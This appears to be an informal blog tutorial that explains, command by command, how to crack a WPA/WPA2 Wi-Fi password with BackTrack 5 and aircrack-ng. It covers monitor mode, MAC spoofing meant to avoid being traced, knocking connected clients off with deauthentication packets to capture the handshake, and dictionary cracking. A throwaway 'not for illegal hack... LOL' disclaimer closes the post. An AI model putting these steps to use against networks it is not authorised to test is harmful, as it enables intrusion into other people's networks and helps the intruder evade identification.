Here I will explain how to crack a WPA or WPA2 network.
With the linuxdistro called BackTrack 5 from following link
---
requirements:
• Backtrack on CD or USB
• Computer compatible with 802.11 WLAN Card
• Wireless Access point or WIFI router WPA / WPA2 encryption used
• A Word List (use google u find many)
---
1.BackTrack Start
Boot your USB stick or your CD / DVD (depending on which BackTrack version you are)
Now start BackTrack.
After the boot process is finished you have to type:
fixvesa
and then:
startx
Enter to access the Graphical interface of BackTrack.
-
2.Now we start!
Open a shell.
Here type:
airmon-ng
one to find out how your wifi adapter is called.
-
3.Change the Mac
Now you know the name of your adapter. (in my case it is wlan0, so I use from now on wlan0 as interface.)
You should change your Mac address that can not be traced back to you later.
Code below:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac (any mac) wlan0
airmon-ng start wlan0
It should look like this:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00: 11: 22: 33: 44: 55 wlan0
airmon-ng start wlan0
-
4.Choose Network
Now you type in the same shell:
airodump-ng
Now the networks are looking for.
On the left we see the BSSID something like the Mac from the router.
If the wished network found, we press Ctrl + C to stop the whole process
Now you copy the BSSID of the desired network.
5.Lets Go
Now you have to find the Channel
with:
airodump-ng-c (channel) -w (filename does not matter what just take wpa or what is easy to remember.) --bssid (BSSID) wlan0
we write our received data in a file.
For example:
airodump-ng-c 11 -w wpa --bssid 00: 14: F8: 4F: 14: 1A wlan0
With this command we will write our wifi network XY with the BSSID 00: 14: F8: 4F: 14: 1A
sending on Channel 11, all received data in the file 'wpa-01.cap'
On WPA/WPA2 its not possible to decrypt the password,like on WEP.
For this we need a 'handshake'.
-
6.The handshake
Our client is connected to the router ,which send with every new application the password in encrypted manner.
We might wait a (likely) forever to get our client reconnects.
But we must not.
In our shell we see below who else is online. If we get a handshake,
we see the top right in the shell. There is then 'handshake'.
We now open a new shell to our clients throw out that he needs to reconnect.
And type:
aireplay-ng -0 5 -a (BSSID) wlan0
5 is the number of tries we want to try all.
But it is not mandatory that all works because newer routers dont allow this anymore.
How do we get the client to disconect?
Is relatively simple. We tell the router: "Hello I'm user XY and would like like to log out."
So we throw the client out:
aireplay-ng -0 1 -a (BSSID)-c (Mac client) wlan0
The Mac client we see below in shell1.
Now we should have a handshake.
-
7.Crack it!
If we have a handshake, we can undisturbed close all our shells, and open a new one.
In this we type:
aircrack-ng (filename) -01.cap
Now we need the wordlist
We now go to our Word List which is for example here.
/ home / wordlists
In my example, is called the Word List 'Wlist.txt'.
Now we enter the following in the Shell:
aircrack-ng (filename) -01.cap -w (path to the Word List)
with me Would it look like this:
aircrack-ng wpa-01.cap -w /home/wordlists/Wlist.txt
Now the program tests all words if they match the encrypted handshake.
If the password is found, it will be shown and youre done.
-
NOTE: THATS NOT FOR ILLEGAL HACK,ITS FOR TEST YOUR OWN SAFETY!!!!LOL
IM NOT RESPONSIBLE FOR ANYTHING!!!!GREEEEEETZ!!!!!!
Keine Kommentare:
Kommentar veröffentlichen